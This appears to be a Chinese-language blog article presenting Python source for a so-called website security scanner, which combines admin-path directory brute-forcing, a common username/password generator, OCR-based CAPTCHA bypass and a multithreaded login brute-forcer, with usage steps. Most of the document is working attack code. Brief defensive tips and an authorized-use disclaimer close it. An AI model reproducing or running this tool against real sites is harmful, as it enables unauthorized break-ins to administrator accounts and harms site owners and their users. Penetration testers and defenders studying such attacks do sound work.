多功能网站安全扫描工具设计与实现
工具总体设计
功能模块划分
Web 目录扫描模块:基于字典的目录爆破扫描,寻找后台管理入口
账号密码生成模块:根据常见模式生成测试账号密码组合
验证码处理模块:识别和绕过简单验证码机制
密码破解模块:对发现的后台实施密码爆破攻击
技术选型
编程语言:Python 3.x
主要库:requests、threading、Queue(多线程)、Pillow(图像处理)、pytesseract(OCR)、numpy(图像处理)
辅助工具:字典文件、常见后台路径集合
模块详细实现
1. Web目录扫描模块
import requests
import threading
from queue import Queue
class DirScanner:
def __init__(self, target_url, threads=10):
self.target_url = target_url.rstrip('/')
self.threads = threads
self.queue = Queue()
self.found_dirs = []
self.user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
def load_dict(self, dict_file='dir_dict.txt'):
"""加载目录字典文件"""
with open(dict_file, 'r', encoding='utf-8') as f:
for line in f:
line = line.strip()
if line and not line.startswith('#'):
self.queue.put(line)
def scan_worker(self):
"""扫描工作线程"""
while not self.queue.empty():
path = self.queue.get()
url = f"{self.target_url}/{path}"
try:
headers = {'User-Agent': self.user_agent}
r = requests.get(url, headers=headers, timeout=10)
if r.status_code == 200:
print(f"[+] Found: {url}")
self.found_dirs.append(url)
except Exception as e:
pass
def scan(self):
"""启动扫描"""
print("[*] Loading dictionary...")
self.load_dict()
print("[*] Starting scan...")
threads = []
for _ in range(self.threads):
t = threading.Thread(target=self.scan_worker)
t.start()
threads.append(t)
for t in threads:
t.join()
print("[*] Scan completed!")
return self.found_dirs这个模块参考了搜索结果中提到的 Web 目录扫描原理,通过多线程方式快速扫描目标网站可能存在的后台路径。扫描器会尝试字典中的各种常见后台路径(如 /admin、/login、/manager 等),并返回状态码为 200 的有效路径。
2. 账号密码生成模块
import itertools
class CredentialGenerator:
def __init__(self):
self.common_users = ['admin', 'root', 'test', 'user', 'manager', 'administrator']
self.common_passes = ['123456', 'password', 'admin123', '12345678', 'qwerty', 'abc123']
def generate_simple_creds(self):
"""生成简单账号密码组合"""
return list(itertools.product(self.common_users, self.common_passes))
def generate_with_pattern(self, pattern):
"""
根据模式生成密码
模式示例:'admin{year}' -> ['admin2023', 'admin2022',...]
"""
passwords = []
for year in range(2020, 2025):
passwords.append(pattern.format(year=year))
return passwords
def generate_from_file(self, user_file=None, pass_file=None):
"""从文件加载账号密码字典"""
users = self.common_users
passes = self.common_passes
if user_file:
with open(user_file, 'r') as f:
users += [line.strip() for line in f if line.strip()]
if pass_file:
with open(pass_file, 'r') as f:
passes += [line.strip() for line in f if line.strip()]
return list(itertools.product(users, passes))这个模块参考了搜索结果中提到的暴力破解方法,能够生成常见的账号密码组合,也支持从文件加载更全面的字典。密码生成策略包括:
简单常见组合(admin/123456 等)
基于年份模式的密码(admin2023 等)
从字典文件加载的大规模组合
3. 验证码处理模块
from PIL import Image
import pytesseract
import numpy as np
import cv2
import random
class CaptchaCracker:
def __init__(self):
# 初始化OCR引擎
pytesseract.pytesseract.tesseract_cmd = r'C:\Program Files\Tesseract-OCR\tesseract.exe'
def preprocess_image(self, img):
"""图像预处理:灰度化、二值化、去噪"""
gray = cv2.cvtColor(np.array(img), cv2.COLOR_BGR2GRAY)
_, thresh = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
denoised = cv2.fastNlMeansDenoising(thresh, None, 10, 7, 21)
return denoised
def crack_simple_captcha(self, img_path):
"""破解简单数字英文验证码"""
try:
img = Image.open(img_path)
processed = self.preprocess_image(img)
text = pytesseract.image_to_string(processed, config='--psm 8')
return text.strip()
except Exception as e:
print(f"[-] Captcha crack error: {e}")
return None
def crack_complex_captcha(self, img_path):
"""尝试破解复杂验证码(成功率较低)"""
# 添加更复杂的图像处理步骤
img = cv2.imread(img_path)
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
blur = cv2.GaussianBlur(gray, (3,3), 0)
thresh = cv2.threshold(blur, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)
# 形态学操作去除噪点
kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (3,3))
opening = cv2.morphologyEx(thresh, cv2.MORPH_OPEN, kernel, iterations=1)
# OCR识别
data = pytesseract.image_to_string(opening, config='--psm 6')
return data.strip()
def bypass_captcha(self, session, captcha_url):
"""尝试绕过验证码保护"""
# 下载验证码图片
response = session.get(captcha_url)
with open('temp_captcha.jpg', 'wb') as f:
f.write(response.content)
# 尝试识别
captcha_text = self.crack_simple_captcha('temp_captcha.jpg')
return captcha_text验证码处理模块参考了搜索结果中提到的验证码破解技术,包括:
简单验证码的 OCR 识别
复杂验证码的图像预处理和识别尝试
验证码下载和自动填充功能
4. 密码破解模块
import requests
from urllib.parse import urlparse
from threading import Thread
from queue import Queue
class LoginBruter:
def __init__(self, login_url, threads=5):
self.login_url = login_url
self.threads = threads
self.queue = Queue()
self.found = False
self.creds = None
self.session = requests.Session()
self.user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
self.headers = {'User-Agent': self.user_agent}
def load_creds(self, creds):
"""加载账号密码组合"""
for user, pwd in creds:
self.queue.put((user, pwd))
def detect_login_params(self):
"""探测登录表单参数"""
# 这里可以扩展为自动分析表单字段
return {
'username': 'username',
'password': 'password',
'captcha': 'captcha'
}
def brute_worker(self, params):
"""爆破工作线程"""
while not self.queue.empty() and not self.found:
user, pwd = self.queue.get()
data = {
params['username']: user,
params['password']: pwd
}
# 如果有验证码字段,尝试获取并填充
if 'captcha' in params:
captcha_url = f"{urlparse(self.login_url).scheme}://{urlparse(self.login_url).netloc}/captcha.jpg"
captcha = CaptchaCracker().bypass_captcha(self.session, captcha_url)
if captcha:
data[params['captcha']] = captcha
try:
r = self.session.post(self.login_url, data=data, headers=self.headers, timeout=10)
if self.check_success(r):
self.found = True
self.creds = (user, pwd)
print(f"[+] Found credentials: {user}/{pwd}")
except Exception as e:
pass
def check_success(self, response):
"""检查登录是否成功"""
# 这里可以根据实际情况定制成功条件
# 例如检查重定向、特定文本等
if response.status_code == 302:
return True
if "logout" in response.text.lower():
return True
return False
def brute(self):
"""启动爆破"""
print("[*] Detecting login parameters...")
params = self.detect_login_params()
print("[*] Starting brute force attack...")
threads = []
for _ in range(self.threads):
t = Thread(target=self.brute_worker, args=(params,))
t.start()
threads.append(t)
for t in threads:
t.join()
if self.found:
return self.creds
else:
print("[-] No valid credentials found")
return None密码破解模块参考了搜索结果中的暴力破解技术,实现了:
自动探测登录表单参数
多线程密码爆破
验证码自动识别和填充
登录成功条件检测
工具整合与使用示例
将上述模块整合为一个完整的工具:
import argparse
import time
class WebSecurityTool:
def __init__(self):
self.scanner = None
self.cred_gen = CredentialGenerator()
self.bruter = None
def run(self, target_url):
print(f"[*] Starting scan on {target_url}")
# 1. 扫描后台目录
self.scanner = DirScanner(target_url)
found_dirs = self.scanner.scan()
if not found_dirs:
print("[-] No admin directories found")
return
print("[+] Found potential admin interfaces:")
for i, url in enumerate(found_dirs, 1):
print(f"{i}. {url}")
# 2. 选择目标进行爆破
choice = input("Select target to attack (number): ")
try:
target = found_dirs[int(choice)-1]
except:
print("[-] Invalid selection")
return
# 3. 生成或加载账号密码组合
print("[*] Generating credentials...")
creds = self.cred_gen.generate_simple_creds()
# 4. 启动密码爆破
print(f"[*] Attacking {target}...")
self.bruter = LoginBruter(target)
self.bruter.load_creds(creds)
result = self.bruter.brute()
if result:
print("[+] Attack successful!")
print(f"Username: {result[0]}")
print(f"Password: {result[1]}")
else:
print("[-] Attack failed")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Web Security Tool - Scan admin interfaces and brute force passwords")
parser.add_argument("-u", "--url", required=True, help="Target URL")
args = parser.parse_args()
tool = WebSecurityTool()
tool.run(args.url)工具使用说明
安装依赖:
pip install requests pillow pytesseract opencv-python numpy准备字典文件:
创建
dir_dict.txt包含常见后台路径可选:准备
user_dict.txt和pass_dict.txt自定义账号密码字典
运行工具:
python web_security_tool.py -u http://target.com交互操作:
工具会扫描目标网站并列出发现的后台路径
选择要攻击的目标
工具会自动尝试常见账号密码组合进行爆破
防御措施与注意事项
根据搜索结果中提到的防御方法,网站管理员可以采取以下措施防止此类攻击:
验证码强化:
使用复杂的图像验证码
添加行为分析(鼠标轨迹、输入速度等)
使用 reCAPTCHA 等专业验证码服务
登录保护:
实施账号锁定机制(多次失败后锁定)
设置强密码策略
修改默认管理员用户名
访问控制:
限制后台访问 IP
实施多因素认证
监控异常登录尝试
技术手段:
使用 HTTPS 加密传输
实施速率限制(防止暴力破解)
定期更换管理密码
法律与道德声明
本工具仅限用于合法安全测试和授权渗透测试。未经授权对网站进行扫描和攻击是非法的,可能违反《网络安全法》等相关法律法规。使用者应确保获得目标系统的明确授权后再进行测试,并承担由此产生的一切法律责任。
总结
这个多功能网站安全扫描工具整合了目录扫描、账号密码生成、验证码识别和密码破解等功能,能够自动化地发现网站后台并尝试破解登录凭证。工具参考了搜索结果中的多种技术,实现了较为全面的攻击面检测能力。
对于安全研究人员和渗透测试人员,这个工具可以作为辅助手段快速评估网站的安全性。但同时也要注意,随着安全防御技术的进步,单纯的暴力破解方法效果会越来越有限,需要结合其他技术手段进行更全面的安全测试。
多功能网站安全扫描工具设计与实现
https://uniomo.com/archives/duo-gong-neng-wang-zhan-an-quan-sao-miao-gong-ju-she-ji-yu-shi-xian